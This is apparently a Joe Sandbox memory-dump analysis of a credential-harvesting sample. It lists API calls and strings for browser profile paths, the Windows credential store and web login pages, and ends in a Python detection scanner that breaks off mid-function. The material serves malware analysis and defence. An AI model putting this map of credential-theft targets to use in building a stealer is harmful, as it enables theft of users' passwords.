                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                            • String ID: visited:
                                                                            • API String ID: 1157525455-1702587658
                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                            Control-flow Graph
                                                                            APIs
                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                            • free.MSVCRT ref: 0040E28B
                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                            • API String ID: 2804212203-2982631422
                                                                            • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                            • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                            • memset.MSVCRT ref: 0040BC75
                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                            • String ID:
                                                                            • API String ID: 115830560-3916222277
                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                            Control-flow Graph
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                            • free.MSVCRT ref: 0041848B
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile$ErrorLastfree
                                                                            • String ID: |A
                                                                            • API String ID: 77810686-1717621600
                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041249C
                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                            • String ID: r!A
                                                                            • API String ID: 2791114272-628097481
                                                                            • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                            • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                            • API String ID: 2936932814-4196376884
                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                            APIs
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                            • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                                            • memset.MSVCRT ref: 0040BE91
                                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                            • String ID:
                                                                            • API String ID: 697348961-0
                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403CBF
                                                                            • memset.MSVCRT ref: 00403CD4
                                                                            • memset.MSVCRT ref: 00403CE9
                                                                            • memset.MSVCRT ref: 00403CFE
                                                                            • memset.MSVCRT ref: 00403D13
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 00403DDA
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                            • API String ID: 3527940856-11920434
                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403E50
                                                                            • memset.MSVCRT ref: 00403E65
                                                                            • memset.MSVCRT ref: 00403E7A
                                                                            • memset.MSVCRT ref: 00403E8F
                                                                            • memset.MSVCRT ref: 00403EA4
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 00403F6B
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                            • API String ID: 3527940856-2068335096
                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403FE1
                                                                            • memset.MSVCRT ref: 00403FF6
                                                                            • memset.MSVCRT ref: 0040400B
                                                                            • memset.MSVCRT ref: 00404020
                                                                            • memset.MSVCRT ref: 00404035
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                            • memset.MSVCRT ref: 004040FC
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                            • API String ID: 3527940856-3369679110
                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                            APIs
                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                            • API String ID: 3510742995-2641926074
                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                            APIs
                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                            • memset.MSVCRT ref: 004033B7
                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                            • String ID: $0.@
                                                                            • API String ID: 2758756878-1896041820
                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 2941347001-0
                                                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403C09
                                                                            • memset.MSVCRT ref: 00403C1E
                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcscat$Closewcscpywcslen
                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                            • API String ID: 3249829328-1174173950
                                                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
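The profile-path functions above (Waterfox\Profiles, Mozilla\SeaMonkey\Profiles, Mozilla\Firefox\Profiles, Mozilla\Profiles) and the SQLite block (no such vfs: %s, NOCASE, RTRIM, BINARY) share a small set of string constants that a triage tool can look for directly in a memory dump or unpacked image. The scanner below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the analysed sample. It assumes the profile paths are stored as UTF-16LE (the surrounding calls are wide-character: wcscpy, _snwprintf, wcscat) and that the SQLite messages are ASCII (SQLite is plain C); it also checks an ASCII encoding of the paths in case a build stores them narrow. The verdict threshold in classify() and the sample buffer are constructed for the demonstration.

```python
"""Triage scanner for the browser-profile and SQLite string constants listed
in the function blocks above.  Added example, not part of the report or of the
sample it describes.  Assumptions: profile paths are UTF-16LE (wide-char API
usage), SQLite messages are ASCII; the demo buffer is constructed."""

import re
from dataclasses import dataclass

# Wide-string constants from the String ID fields of the profile-path functions.
PROFILE_MARKERS = (
    r"Mozilla\Firefox\Profiles",
    r"Mozilla\SeaMonkey\Profiles",
    r"Waterfox\Profiles",
    r"Mozilla\Profiles",
)

# ASCII constants from the embedded SQLite runtime (collation names, VFS error).
SQLITE_MARKERS = (
    b"no such vfs: %s",
    b"NOCASE",
    b"RTRIM",
    b"BINARY",
)


@dataclass(frozen=True)
class Hit:
    marker: str    # the constant that matched, as text
    encoding: str  # "utf-16-le" or "ascii"
    offset: int    # byte offset in the scanned buffer


def find_markers(buf: bytes) -> list[Hit]:
    """Return every occurrence of a known marker in buf, sorted by offset."""
    hits: list[Hit] = []
    for text in PROFILE_MARKERS:
        for enc in ("utf-16-le", "ascii"):
            needle = text.encode(enc)
            for m in re.finditer(re.escape(needle), buf):
                hits.append(Hit(text, enc, m.start()))
    for needle in SQLITE_MARKERS:
        for m in re.finditer(re.escape(needle), buf):
            hits.append(Hit(needle.decode("ascii"), "ascii", m.start()))
    return sorted(hits, key=lambda h: h.offset)


def classify(hits: list[Hit]) -> str:
    """Heuristic verdict (threshold is an assumption for this example):
    two or more distinct browser profile paths together with the SQLite VFS
    error string is the combination a Mozilla-family password recovery
    routine needs; anything less is reported as partial evidence."""
    profiles = {h.marker for h in hits if h.marker in PROFILE_MARKERS}
    sqlite = {h.marker for h in hits if h.marker.encode() in SQLITE_MARKERS}
    if len(profiles) >= 2 and "no such vfs: %s" in sqlite:
        return "browser-credential-recovery"
    if profiles or sqlite:
        return "partial"
    return "none"


def build_sample() -> bytes:
    """Constructed demo buffer: padding with markers embedded at known offsets."""
    return (
        b"\x00" * 16
        + r"Mozilla\Firefox\Profiles".encode("utf-16-le")   # offset 16, 48 bytes
        + b"\x00" * 8
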